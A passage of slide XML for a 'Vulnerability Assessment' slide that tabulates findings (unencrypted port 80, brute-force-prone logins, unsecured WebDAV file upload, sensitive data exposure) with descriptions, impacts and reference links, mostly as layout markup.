                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="78909c"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:no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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="0"/>
            <a:ext cx="9168120" cy="533520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="274320" tIns="182880" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Vulnerability Assessment</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="676080"/>
            <a:ext cx="9143640" cy="364320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="457200" tIns="91440" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>The assessment uncovered the following critical vulnerabilities in the target:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="4916520"/>
            <a:ext cx="7971480" cy="226440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="274320" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="294" name="Google Shape;1084;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467280" y="1090080"/>
          <a:ext cx="8362080" cy="3359880"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2787480"/>
                <a:gridCol w="2787480"/>
                <a:gridCol w="2787480"/>
              </a:tblGrid>
              <a:tr h="392760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="990000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="990000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Impact</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="990000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="896760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="t">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Open Port 80 Without SSL or Encryption</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en" sz="1100" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>https://www.lifars.com/2020/10/are-open-ports-a-security-risk/</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="t" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="t">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en" sz="1200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="0d0d0d"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Used by HTTP and HTTPS. HTTP servers and their various components are very exposed and often sources of attacks.</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="t" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="dbd9e8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="t">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en" sz="800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="ffffff"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>An attacker with network access to the web server on port 80/TCP or 443/TCP could execute system commands with administrative privileges. The security vulnerability could be exploited by an unauthenticated attacker with network access to the affected service.</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="t" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="719640">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="t">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Brute Force Attack Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en" sz="1100" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>https://www.fortinet.com/resources/cyberglossary/brute-force-attack</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="t" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="t">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en" sz="900" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Site directories had simple login windows with no or weak password policy in place allowing for multiple rapid login attempts that are utilized with Brute Force Attack utilities. </a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="t" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="dbd9e8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="t">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Allows for attacker to continuously attempt and test credentials out on a website until a successful login is found to access data.</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="t" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="835560">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="t">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Unsecured WebDAV Enabled</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>(Unauthorized File Upload)</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>https://www.invicti.com/web-vulnerability-scanner/vulnerabilities/webdav-enabled/</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="t" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="t">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>WebDAV is an extension to the HTTP protocol and it allows authorized users to remotely add and change content on your web server.</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="t" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="dbd9e8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="t">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>If WebDAV is not configured properly, it may allow remote users to modify the content of the website and/ or upload malicious code files to be executed.</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="t" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="852120">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="t">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Sensitive Data Exposure</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>https://hdivsecurity.com/owasp-sensitive-data-exposure</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
